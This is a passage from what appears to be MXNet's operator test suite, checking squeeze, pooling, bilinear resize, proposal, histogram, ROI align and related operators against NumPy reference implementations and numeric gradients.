data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@pytest.mark.serial
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
date_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, date_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, date_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, date_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
# Preparing the output of elements of the array, which are considered as "not close" AND
# corresponding elements of comparison CPU/GPU/Python vectors, which are considered as "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
# Define the indices of all violations and corresponding values of coordinates
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
idx = np.asarray(np.where(bad_indexes == True))
idx = idx.reshape(1, idx.size)
idx_flat = np.asarray(np.where(bad_indexes.flatten() == True)).flatten()
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@pytest.mark.serial
def test_allclose_function():
allclose_function([default_device()])
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1._bind(ctx=default_device(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2._bind(ctx=default_device(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@pytest.mark.serial
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_unravel_index():
unravel_shape = (2, 10)
unravel_size = np.prod(unravel_shape)
for shape in [(10,), (2, 10), (3, 4, 5)]:
a = np.random.randint(0, unravel_size, size=shape)
b = np.stack(np.unravel_index(a, shape=unravel_shape), 0)
a_mx = mx.nd.array(a)
b_mx = mx.nd.unravel_index(a_mx, shape=unravel_shape)
assert_array_equal(b, b_mx.asnumpy())
def test_device_num_gpus():
try:
# Note: the test is run both on GPU and CPU hosts, so that we can not assert
# on a specific number here.
assert mx.device.num_gpus() >= 0
except mx.MXNetError as e:
# Note: On a CPU only host CUDA sometimes is not able to determine the number
# of GPUs
if str(e).find("CUDA") == -1:
raise e
def test_context_backward_compatibility():
try:
# Note: the test is run both on GPU and CPU hosts, so that we can not assert
# on a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
# Note: On a CPU only host CUDA sometimes is not able to determine the number
# of GPUs
if str(e).find("CUDA") == -1:
raise e
if mx.context.num_gpus() > 0:
test_input = mx.np.ones((1,), ctx=mx.context.gpu())
assert test_input.ctx == test_input.context
context = test_input.ctx
(free_mem_bytes, total_mem_bytes) = mx.context.gpu_memory_info(context.device_id)
test_input_cpu = test_input.as_in_ctx(mx.context.cpu())
test_input_gpu = test_input_cpu.as_in_context(mx.context.gpu())
assert context == test_input_gpu.context
@pytest.mark.serial
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_device()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_device()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
